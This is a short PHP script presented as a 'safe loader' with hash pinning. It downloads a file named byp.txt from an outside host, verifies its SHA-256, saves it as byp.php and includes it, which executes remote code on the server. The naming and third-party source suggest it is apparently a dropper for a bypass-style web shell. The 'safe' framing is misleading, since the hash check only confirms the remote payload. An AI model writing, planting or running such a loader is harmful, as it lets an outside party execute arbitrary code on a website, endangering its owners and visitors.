<?php
// Safe loader by file hash pinning.
// Configure:
$remoteUrl      = 'https://member.soraha.jp/crawler/byp.txt';
$localFile      = __DIR__ . '/byp.php';               // final file to write before include
$expectedSha256 = '4420af9d9e877f376cdbf91c8937628780e1598660f06386bce693c7a3687beb';  // lowercase hex, 64 chars

// Download with strict SSL
function fetch(string $url, int $timeout = 10): string|false {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_TIMEOUT => $timeout,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
    ]);
    $body = curl_exec($ch);
    $err  = curl_errno($ch);
    curl_close($ch);
    if ($body === false || $err !== 0) return false;
    return $body;
}

// 1) fetch remote payload
$payload = fetch($remoteUrl);
if ($payload === false) {
    http_response_code(500);
    exit('download failed');
}

// 2) verify exact sha256
$sha = hash('sha256', $payload);
if (!hash_equals($expectedSha256, $sha)) {
    http_response_code(403);
    error_log("byp loader: sha mismatch. expected {$expectedSha256} got {$sha}");
    exit('integrity check failed');
}

// 3) write atomically and set tight perms
$tmp = tempnam(sys_get_temp_dir(), 'byp_');
if ($tmp === false) { http_response_code(500); exit('tempfile failed'); }

if (file_put_contents($tmp, $payload) === false) {
    @unlink($tmp);
    http_response_code(500);
    exit('write failed');
}
chmod($tmp, 0600);

if (!rename($tmp, $localFile)) {
    @unlink($tmp);
    http_response_code(500);
    exit('atomic install failed');
}
chmod($localFile, 0600);

// 4) include the now-verified file
include_once $localFile;